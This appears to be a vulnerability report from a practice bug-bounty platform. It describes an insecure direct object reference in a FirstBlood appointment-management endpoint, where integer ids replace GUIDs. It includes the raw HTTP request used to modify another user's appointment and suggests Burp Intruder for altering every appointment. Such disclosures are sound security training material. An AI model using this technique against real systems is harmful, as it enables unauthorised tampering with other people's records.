FirstBlood-#127IDOR on ma.php
This issue was discovered on FirstBlood v1.0.0



On 2021-05-10, jpdev Level 3 reported:

Summary

The manage appointments API allows for the use of interger values by capturing the request within burp and amending the guid to its interger id. This ID can be found on the index page of the drpanel within the source of the page within the getinfo function call.

Request

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 24
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10

message=test&id=56911904

iMPACT

A melicious user can now use BURP intruder to amend all appointments removing potentially key notes.

P2 High

Endpoint: /api/ma.php

Parameter: id=

Payload: 56911904


FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference

The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.